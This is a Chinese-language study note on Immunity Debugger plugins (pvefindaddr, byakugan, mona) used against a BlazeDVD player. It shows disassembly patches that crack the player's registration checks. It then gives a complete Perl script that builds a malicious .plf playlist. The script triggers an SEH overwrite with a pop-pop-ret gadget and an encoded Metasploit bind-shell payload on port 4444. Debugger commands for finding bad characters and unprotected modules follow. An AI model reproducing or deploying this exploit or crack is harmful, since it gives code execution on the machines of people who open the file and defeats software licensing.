!pvefindaddr 插件使用学习

随便下载的  BlazeDVD 版本  来实验················

XP SP3  无DEP 

首先程序破解：

很简单  直接搜搜字符串    修改几个jmp  即可成功

6030324B   . /E9 35030000   jmp Configur.60303585
60303250   > |68 C0003460   push Configur.603400C0                   ;  IsRegistered1
60303255   . |57            push edi
60303256   . |E8 15570100   call Configur.60318970
6030325B   . |83C4 08       add esp,0x8
6030325E   . |85C0          test eax,eax 
60303260     |E9 93000000   jmp Configur.603032F8                  //jmp

603033A1   > 68 A87A3460   push Configur.60347AA8                   ;  IsRegistered3
603033A6   .  57            push edi
603033A7   .  E8 C4550100   call Configur.60318970
603033AC   .  83C4 08       add esp,0x8
603033AF   .  85C0          test eax,eax
603033B1      E9 94000000   jmp Configur.6030344A                  //jmp
603033B6      90            nop

6030344A   > 68 947A3460   push Configur.60347A94                   ;  IsPlaybackTimeOut
6030344F   .  57            push edi
60303450   .  E8 1B550100   call Configur.60318970
60303455   .  83C4 08       add esp,0x8
60303458   .  85C0          test eax,eax
6030345A      EB 1B         jmp XConfigur.60303477

60303477   > 57            push edi
60303478   .  8D4E E8       lea ecx,dword ptr ds:[esi-0x18]
6030347B   .  E8 E0280000   call Configur.60305D60
60303480   .  8BD8          mov ebx,eax
60303482   .  83FB FF       cmp ebx,-0x1
60303485      EB 07         jmp XConfigur.6030348E
60303487   .  33C0          xor eax,eax
60303489   .  E9 F7000000   jmp Configur.60303585
6030348E   >  68 E0773460   push Configur.603477E0                   ;  AutoResumeMode
60303493   .  57            push edi

本来是用  反弹shell 的sehllcode  但是  "x1a" 字符被检查到了  不能用·············
PERL脚本：

my $file = "test.plf";

#0x1000ecfa pop ebx; pop ebp; ret
#0x1000ef4a pop esi; pop ebp; ret
#0x1000f00e pop edi; pop esi; ret
#0x100101e7 pop esi; pop ecx; ret
#0x1001028f pop esi; pop ebx; retn 0x0010
#0x100104d7 pop ebx; pop ecx; retn 0x000c
#0x10010511 pop esi; pop ebx; retn 0x000c
#0x1001058a pop ebp; pop ebx; retn 0x0010
#0x10010595 pop ebp; pop ebx; retn 0x0010
#0x1001059f pop ebp; pop ebx; retn 0x0010
#0x100105f1 pop esi; pop ebx; retn 0x000c
my $junk = "xcc"x608;
my $nseh = "xebx1ex90x90";
my $seh = pack('V',0x10010511);
my $prejunk = "x90"x30;
# windows/shell_bind_tcp - 368 bytes  
# http://www.metasploit.com  
# Encoder: x86/shikata_ga_nai  
# LPORT=4444, RHOST=x.x.x.x, EXITFUNC=seh,   
#x1a
my $shellcode =   
"xD9xEE".
"xD9x74x24xF4".
"x58".
"x83xC0x1b".
"x33xC9".
"x8Ax1Cx08" .
"x80xF3x11".
"x88x1Cx08".
"x41" .
"x80xFBx90".
"x75xF1".
"xedx79x7bx1bx29x0fx79x72x98xc0x5ex79x23x65x80x1d".
"x9axe5x9cx6fxe5x22xcaxa6x15x3axf2x77xaax22x23x42".
"x79x64x62x74x63x45x22xc3x75x9ax4bx21x9ax5ax1dx9a".
"x58x0dx9ax18x9ax78x19xbcx2cx7bx1bx29x0fx64x14x84".
"xeex46xe9x84x71x9ax54x2dx9ax5dx14x69x12xdcx9ax48".
"x31x12xccx22xeex56x9ax25xaax12xe4x88x1exafx17x2b".
"xd5x65x19xd0xdbx16x12xc1x57xfaxe0x2ax45x35x0dx64".
"xf5x9ax48x35x12xccx77x9ax2dx6ax9ax48x0dx12xccx12".
"x3dxaax84x4exbax46x70x2cx7bx1bx29x0fx64xb8x22xca".
"x42x79x75x70x21x32x79x32x41x70x7fx9axd5x42x41x41".
"x42xeex46xedx42xeex46xe9x81";


my $payload = $junk.$nseh.$seh.$prejunk.$shellcode;

open($FILE,">$file");
print $FILE $payload;
close($FILE);

下面学习检查可能存在的  bad characters 

!load byakugan

!jutsu memDiff file 302 c:sploitsshell.txt 0x0012f5de

                                  shellcode长度   +  包含shellcode的文件+ 内存中 的起始地址

粗字体为  不同的地方 

我将上面的shellcode   "xee"   全改为了  "xcc"   检查如下：

!load byakugan

!jutsu identBuf file myShell c:shell.txt

!jutsu identBuf msfpattern myBuffer 608

!jutsu listBuf

!searchcode jmp esp   可以显示  模块属性          DEP寻找特殊代码时要用！！！！！！！！！！！！！！！

!aslrdynamicbase   查看随机分布的模块

!pvefindaddr        j   jmp/call ret 组合

            jseh  用于绕过 SAFESEH 保护时特别有用

    nosafeseh  未经saffeseh保护的模块

!packets 用于捕获无线数据包   打开网页  附加  !packet  继续运行   查看 captured Packets 窗口

!safeseh 列出可执行模块，并提示是否受 safeseh保护  !safeseh 命令

!mona bytearray  ······················· 可以生成 00-ff 去检测bad character

找寻 shellcode 位置  !mona cmp -f c:1egg1.bin